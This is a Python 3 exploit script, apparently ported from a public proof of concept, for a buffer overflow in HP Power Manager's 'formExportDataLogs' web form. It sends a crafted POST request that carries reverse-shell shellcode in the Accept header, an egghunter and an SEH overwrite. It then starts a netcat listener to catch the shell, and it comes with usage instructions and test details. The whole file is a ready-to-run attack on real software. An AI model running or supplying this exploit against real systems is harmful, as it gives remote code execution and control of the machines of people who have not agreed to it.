#!/usr/bin/python
# This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari
# For the original script visit: https://github.com/Muhammd/HP-Power-Manager
# 
# Usage: python3 hp_pm_exploit_p3.py <Remote IP Address> <Remote Port> <Local Listener Port>
# <Remote IP Address>: ip address the HP Power Manager is running on
# <Remote Port>: port the application is running on
# <Local Listener Port>: local port your shellcode is connecting back to -> script starts nc listener to catch reverse shell
#
# Swap out the shellcode
# Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate (6.1.7600 N/A Build 7600)
# Author: CountablyInfinite

from urllib import parse
from time import sleep
from sys import argv,exit
from socket import socket,AF_INET,SOCK_STREAM
from os import system

try:
   HOST  = argv[1]
   PORT = int(argv[2]) # port the remote application is running on
   LPORT = int(argv[3]) # port the shellcode is connecting back to -> listener gets sta
   if (len(argv)>4):
      raise IndexError
except IndexError: 
   print("Usage: python3 %s <Remote IP Address> <Remote Port> <Local Listener Port>" % argv[0])
   print("Example: python3 %s 10.10.0.1 80 4411" % argv[0])
   exit()

#msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
egg = "b33fb33f"
buf = egg
buf += "\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += "\x81\x76\x0e\x99\x95\x85\xbb\x83\xee\xfc\xe2\xf4"
buf += "\x65\x7d\x07\xbb\x99\x95\xe5\x32\x7c\xa4\x45\xdf"
buf += "\x12\xc5\xb5\x30\xcb\x99\x0e\xe9\x8d\x1e\xf7\x93"
buf += "\x96\x22\xcf\x9d\xa8\x6a\x29\x87\xf8\xe9\x87\x97"
buf += "\xb9\x54\x4a\xb6\x98\x52\x67\x49\xcb\xc2\x0e\xe9"
buf += "\x89\x1e\xcf\x87\x12\xd9\x94\xc3\x7a\xdd\x84\x6a"
buf += "\xc8\x1e\xdc\x9b\x98\x46\x0e\xf2\x81\x76\xbf\xf2"
buf += "\x12\xa1\x0e\xba\x4f\xa4\x7a\x17\x58\x5a\x88\xba"
buf += "\x5e\xad\x65\xce\x6f\x96\xf8\x43\xa2\xe8\xa1\xce"
buf += "\x7d\xcd\x0e\xe3\xbd\x94\x56\xdd\x12\x99\xce\x30"
buf += "\xc1\x89\x84\x68\x12\x91\x0e\xba\x49\x1c\xc1\x9f"
buf += "\xbd\xce\xde\xda\xc0\xcf\xd4\x44\x79\xca\xda\xe1"
buf += "\x12\x87\x6e\x36\xc4\xfd\xb6\x89\x99\x95\xed\xcc"
buf += "\xea\xa7\xda\xef\xf1\xd9\xf2\x9d\x9e\x6a\x50\x03"
buf += "\x09\x94\x85\xbb\xb0\x51\xd1\xeb\xf1\xbc\x05\xd0"
buf += "\x99\x6a\x50\xeb\xc9\xc5\xd5\xfb\xc9\xd5\xd5\xd3"
buf += "\x73\x9a\x5a\x5b\x66\x40\x12\xd1\x9c\xfd\x45\x13"
buf += "\xb4\x2c\xed\xb9\x99\x95\xd5\x32\x7f\xff\x95\xed"
buf += "\xce\xfd\x1c\x1e\xed\xf4\x7a\x6e\x1c\x55\xf1\xb7"
buf += "\x66\xdb\x8d\xce\x75\xfd\x75\x0e\x3b\xc3\x7a\x6e"
buf += "\xf1\xf6\xe8\xdf\x99\x1c\x66\xec\xce\xc2\xb4\x4d"
buf += "\xf3\x87\xdc\xed\x7b\x68\xe3\x7c\xdd\xb1\xb9\xba"
buf += "\x98\x18\xc1\x9f\x89\x53\x85\xff\xcd\xc5\xd3\xed"
buf += "\xcf\xd3\xd3\xf5\xcf\xc3\xd6\xed\xf1\xec\x49\x84"
buf += "\x1f\x6a\x50\x32\x79\xdb\xd3\xfd\x66\xa5\xed\xb3"
buf += "\x1e\x88\xe5\x44\x4c\x2e\x65\xa6\xb3\x9f\xed\x1d"
buf += "\x0c\x28\x18\x44\x4c\xa9\x83\xc7\x93\x15\x7e\x5b"
buf += "\xec\x90\x3e\xfc\x8a\xe7\xea\xd1\x99\xc6\x7a\x6e"

#egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
hunter =  b""
hunter += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

buffer = b"\x41" * (721 -len(hunter))
buffer += b"\x90"*30 + hunter
buffer += b"\xeb\xc2\x90\x90"            #JMP SHORT 0xC2 
buffer += b"\xd5\x74\x41" 	              #pop esi # pop ebx # ret 10 (DevManBE.exe)

content= "dataFormat=comma&exportto=file&fileName=%s" % parse.quote_plus(buffer)
content+="&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"

payload =  "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % buf
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit")
print("[+] Sending exploit to Ip " +str(HOST)+" on port "+str(PORT)+". Starting local listener on port "+str(LPORT))
s.send(payload.encode('latin1'))
system("sudo nc -nlvp "+ str(LPORT))
s.close()